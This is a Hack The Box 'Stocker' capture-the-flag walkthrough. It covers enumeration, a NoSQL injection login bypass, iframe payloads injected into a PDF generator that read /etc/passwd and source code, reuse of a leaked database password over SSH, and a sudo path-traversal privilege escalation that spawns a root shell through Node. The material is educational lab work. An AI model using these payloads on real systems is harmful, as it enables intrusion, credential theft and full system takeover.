Hack The Box | Stocker | Write Up

Just tackled the ‘Stocker’ machine on #HackTheBox. Loved the explotation of web vulnerabilities and the challenge of the injections! If you’re into #CTF, this is a must try! 🚀 #CyberSecurity #PenTesting #EthicalHacking #InfoSec

We will check which kind of services are running in this machine with NMAP:

sudo nmap -sT -n -Pn -sV -T4 -v

We have found two open ports (22/TCP and 80/TCP):

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Now, we will check the nginx server through our navigator but first we need to add the server to our “/etc/hosts” file:

We found some kind of business web page:

Now, we need to check the functionality of the web page to try to find something interesting. Also, we can run “ffuf” tool to discover more interesting directories:

sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u http://stocker.htb/FUZZ -v
[Status: 200, Size: 15463, Words: 4199, Lines: 322, Duration: 50ms]
| URL | http://stocker.htb/
    * FUZZ: 

[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 62ms]
| URL | http://stocker.htb/css
| --> | http://stocker.htb/css/
    * FUZZ: css

[Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 51ms]
| URL | http://stocker.htb/favicon.ico
    * FUZZ: favicon.ico

[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 48ms]
| URL | http://stocker.htb/fonts
| --> | http://stocker.htb/fonts/
    * FUZZ: fonts

[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 52ms]
| URL | http://stocker.htb/img
| --> | http://stocker.htb/img/
    * FUZZ: img

[Status: 200, Size: 15463, Words: 4199, Lines: 322, Duration: 51ms]
| URL | http://stocker.htb/index.html
    * FUZZ: index.html

[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 77ms]
| URL | http://stocker.htb/js
| --> | http://stocker.htb/js/
    * FUZZ: js

:: Progress: [4614/4614] :: Job [1/1] :: 649 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

We haven’t found nothing interesting but we need to still checking the web page:

We haven’t found nothing interesting in the source code. We can try to enumerate the subdomain with “fuff”. We will perform a VHOST discovery (https://medium.com/quiknapp/fuzz-faster-with-ffuf-c18c031fc480):

sudo ffuf -c -w /home/david/hackthebox/stocker/dic.txt -u http://stocker.htb -H "Host: FUZZ.stocker.htb" -mc 200,302,307 -v

I have used this dictionary:


We will found one posible directory:


 :: Method           : GET
 :: URL              : http://stocker.htb
 :: Wordlist         : FUZZ: /home/david/hackthebox/stocker/dic.txt
 :: Header           : Host: FUZZ.stocker.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,302,307

[Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 72ms]
| URL | http://stocker.htb
| --> | /login
    * FUZZ: dev

:: Progress: [4989/4989] :: Job [1/1] :: 653 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

We need to add this new subdomain in our “/etc/hosts” file:

After that, we will can see this new web page:

Apparently is some kind of login. Let’s try to get more information about this login. We will try if we can do some SQL Injection with sqlmap:

sudo sqlmap -u "http://dev.stocker.htb/login" --data="username=example&password=example"

We have received any information about which database is in the backend. We will try to exploit no SQL databases. We can find some information about that here (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL Injection). We will try with the next payload:

{"username": {"$ne": null}, "password": {"$ne": null}}

Now, we need to modify our request to try to bypass the login. We need to modify the “Content-Type” and the data (user and password):

Finally, we have done our bypass and we will received another redirection to “/stock”:

Now we will check some function of this web page like add some products, check the cart, etc. If we check how to add some products to our basket, we will see this message:

Probable, here we have some interesting. Also, we can check the option “View Cart” to check our products:

If we checking the request with burp suite we will see the petition with the data in JSON and probable we can modify it:

Another function is generating pdf’s with our purchases:

We can check the request with burp suite to see if something weird is happend:

We will see all of our products but let’s try modify our request to see if the PDF change with our values:

We will check the vulnerability XSS with Dynamic PDF. To do that we will change our “Submit Purchase” request with the next payload to see if we have some tips of disclosure. We will inject this payload into the key “tittle”:


After create our “order” we will click in our link to see our PDF:

We will discover that this web is vulnerable to XSS with Dynamic PDF (https://exploit-notes.hdks.org/exploit/web/security-risk/xss-with-dynamic-pdf/):

Now we will try to extract more information to try to gain access. We can try to obtain the “/etc/passwd” file:

<iframe src=file:///etc/passwd></iframe>

Now we need to generate the PDF:

We will see our data but with one issue we can’t see all the data because we have used a small iframe:

We need to modify our payload with something like this:

<iframe src=file:///etc/passwd height=1000 width=1000></iframe>

Now we will see all:

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin

We have discovered two users:


In this point, we can try to extract more information from the index file in the directory we already have detected in our discover phase:

/var/www/dev/ - URL
<iframe src=file:///var/www/dev/index.js height=1000 width=1000></iframe>

We will discover the database password:

const dbURI = "mongodb://dev:IHeardPassphrasesArePrettySecure@localhost/dev?authSource=admin&w=1";

But we can’t connect whit the user mongodb through SSH because this user has disabled this function. We will try to check this password with the another user we have discovered:

ssh angoose@ - IHeardPassphrasesArePrettySecure

Finally, we already have our first remote connection:

Also, we can get our user flag:

goose@stocker:~$ ls
flag.js  flag.js.save  user.txt

angoose@stocker:~$ cat user.txt 

Time to try to get access as a root. Let’s see if we can execute some script or something with sudo privileges:

angoose@stocker:~$ sudo -l
[sudo] password for angoose: 
Matching Defaults entries for angoose on stocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User angoose may run the following commands on stocker:
    (ALL) /usr/bin/node /usr/local/scripts/*.js

We have detected we can execute any “js” script in the directory “/usr/local/scripts” with the binary “/usr/bin/node” with sudo privileges. With a little search in google we can found this link (https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-path-traversal-privilege-escalation/). Now to try to do PE, first of all, we need to create a new file in “/tmp/file.js” with this content:

require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})

Now we will do a “Sudo Path Traversal Privilege Escalation”:

sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js

Finally, we have access like a root:

Also, we have access to the root flag:

# cd /root      

# ls -la
total 44
drwx------  6 root root 4096 Jan  9 10:42 .
drwxr-xr-x 20 root root 4096 Dec 23 16:58 ..
lrwxrwxrwx  1 root root    9 Dec  6  2022 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Nov 19  2022 .bashrc
drwx------  3 root root 4096 Dec  6  2022 .cache
drwxr-xr-x  3 root root 4096 Dec  6  2022 .local
drwx------  3 root root 4096 Dec  6  2022 .mongodb
drwxr-xr-x  4 root root 4096 Dec  6  2022 .npm
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Jun  9 14:08 root.txt
-rw-r--r--  1 root root   66 Dec 21 21:35 .selected_editor
-rw-r--r--  1 root root   13 Nov 19  2022 .vimrc

# cat root.txt

Finally, we pwned this machine!

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.